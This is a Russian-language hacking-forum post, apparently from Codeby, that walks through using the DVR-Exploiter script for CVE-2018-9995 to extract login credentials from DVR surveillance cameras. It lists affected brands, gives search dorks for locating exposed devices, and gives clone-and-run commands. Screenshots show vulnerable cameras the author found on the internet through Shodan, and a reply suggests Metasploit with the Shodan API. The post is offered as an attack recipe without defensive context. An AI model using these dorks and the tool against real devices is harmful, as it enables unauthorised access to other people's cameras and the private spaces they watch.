• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Soft CVE-2018-9995 - DVR-Exploiter

Всем привет. В этой статье будет показан софт с уязвимостью , подобная тема уже была. Тык -== CVE-2018-9995 или как получить логин и пароль к DVR камере
Я показываю другой вариант.(С другим скриптом.)
Страница разработчика -== TunisianEagles/DVR-Exploiter

Как по мне , то уязвимость (CVE-2018-9995) уже себя изжила. Или я невнимательный.

control.jpg


Код: 
Протестировано (DVR) :

Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus,  - Security. Never Compromise !! -
Night OWL
DVR Login
HVR Login
MDVR Login

Код: 
Dorks: intitle:"DVR Login"
       html:"/login.rsp"
       "Server: GNU rsp/1.1"

Код: 
Установка и запуск:
# git clone https://github.com/TunisianEagles/DVR-Exploiter.git
# cd DVR-Exploiter

$ Запуск -== ./DVR-Exploiter.sh

Screenshot from 2018-09-24 18-36-54.png


Используем shodan.

Screenshot from 2018-09-24 18-58-13.png


Screenshot from 2018-09-24 19-09-23.png


Нашли.
Screenshot from 2018-09-24 18-41-13.png

Еще нашли.

Screenshot from 2018-09-24 18-46-27.png


Screenshot from 2018-09-24 18-42-49.png


Screenshot from 2018-09-24 18-43-39.png


Есть даже видео:

Спасибо за внимание.
 
  • Нравится
Реакции: GlowFisch, sk3l, Vertigo и ещё 2
Нажмите, чтобы раскрыть...
R

R3M1X

Green Team
16.02.2020
117
20
BIT
0
всё тоже самое можно использовать через metasploit+shodan api
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ